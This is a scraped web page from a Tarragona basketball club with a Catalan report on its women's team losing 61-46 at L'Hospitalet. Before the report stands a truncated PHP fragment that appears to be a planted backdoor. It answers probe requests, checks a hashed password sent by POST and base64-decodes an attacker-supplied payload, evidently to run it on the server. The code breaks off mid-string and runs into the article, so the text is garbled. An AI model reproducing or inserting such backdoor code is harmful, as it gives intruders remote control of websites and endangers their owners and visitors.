function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN dona la cara però cau a Hospitalet (61-46) - Tgn Bàsquet Club -

El TGN dona la cara però cau a Hospitalet (61-46)

Updated: febrer 26, 2024

Partit corresponent a la divuitena jornada de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del CEJ L’Hospitalet, equip que arribava amb un balanç de 14 victories i 3 derrotes.

El TGN Bàsquet va sortir a pista conscient de que calia millorar la versió oferida per l’equip en els últims partits, i així va ser. L’equip dirigit per Israel Esteve va fer un bon inici de partit, competint de tu a tu al segon classificat de la lliga durant els primers 20 minuts de partit (11-10 al final del primer quart i 25-23 al descans). Novament, la defensa va ser la clau per mantenir-se amb opcions al partit, tancant el cèrcol davant del conjunt més anotador de la categoria.

Després del pas per vestuaris, l’equip local va aconseguir trobar més espais i va castigar a la defensa tarragonina, que va encaixar un parcial de 12-3 en els primers minuts del tercer periode. Tot i això, el TGN no li va perdre la cara al partit i va tancar el quart amb bones accions ofensives que van escurçar la diferència fins al 39-33.

Finalment, a l’últim periode, l’encert en els llançaments de les de l’Hospitalet i el gran volum de tirs lliures que va disposar (26 per les locals en contra dels 13 pel TGN) van acabar de sentenciar un partit del qual el marcador final no reflexa la igualtat que es va veure a pista.

A la propera jornada, el TGN rebrà la visita del Femení Sant Adrià, el dissabte 2 de març a les 19:30h.